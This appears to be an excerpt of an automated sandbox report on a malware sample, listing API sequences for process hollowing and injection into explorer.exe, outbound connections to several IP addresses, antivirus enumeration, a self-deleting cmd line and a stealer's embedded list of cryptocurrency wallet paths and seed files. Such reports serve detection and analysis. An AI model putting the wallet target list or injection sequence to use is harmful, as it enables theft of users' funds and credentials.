Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 15_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 10_2_00412220
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E20D90 mov eax, dword ptr fs:[00000030h] 0_2_02E20D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E2092B mov eax, dword ptr fs:[00000030h] 0_2_02E2092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E51E41 push dword ptr fs:[00000030h] 0_2_02E51E41
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_02EE0D90 mov eax, dword ptr fs:[00000030h] 4_2_02EE0D90
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_02EE092B mov eax, dword ptr fs:[00000030h] 4_2_02EE092B
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_02F21241 push dword ptr fs:[00000030h] 4_2_02F21241
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_049760A3 push dword ptr fs:[00000030h] 9_2_049760A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A10042 push dword ptr fs:[00000030h] 9_2_04A10042
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_049DC0A3 push dword ptr fs:[00000030h] 14_2_049DC0A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 14_2_04A70042 push dword ptr fs:[00000030h] 14_2_04A70042
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004278D5 GetProcessHeap, 10_2_004278D5
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_004329BB SetUnhandledExceptionFilter, 10_2_004329BB
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_004329BB SetUnhandledExceptionFilter, 15_2_004329BB

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exe File created: rujtcgu.1.dr Jump to dropped file
Source: C:\Windows\explorer.exe Network Connect: 189.163.126.89 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.174.152.66 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 193.233.132.167 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.92.253.69 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.154.13.143 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 158.160.165.129 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.196.109.209 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.159.134.233 443 Jump to behavior
Source: Yara match File source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 9_2_04A10110
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: B4D19A0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Thread created: unknown EIP: 7D719A0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Thread created: unknown EIP: 9CE19A0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Memory written: C:\Users\user\AppData\Local\Temp\E609.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Memory written: C:\Users\user\AppData\Local\Temp\E609.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Memory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Memory written: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Memory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Memory written: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Memory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\rujtcgu Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Section unmapped: C:\Windows\System32\conhost.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 10_2_00419F90
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *Progman8
Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1688395629.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2890584363.0000000005340000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_04A380F6 cpuid 9_2_04A380F6
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 9_2_04A50AB6
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 10_2_00438178
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 10_2_00440116
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 10_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 10_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 10_2_00438423
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: EnumSystemLocalesW, 10_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: GetLocaleInfoW, 10_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW, 10_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: EnumSystemLocalesW, 10_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 10_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 10_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 10_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 14_2_04AB0AB6
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 15_2_00438178
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 15_2_00440116
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 15_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 15_2_00438423
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: EnumSystemLocalesW, 15_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: GetLocaleInfoW, 15_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 15_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: EnumSystemLocalesW, 15_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 15_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 15_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 15_2_00437F83
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 9_2_00408E4E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_00408E4E
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 10_2_0042FE47
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
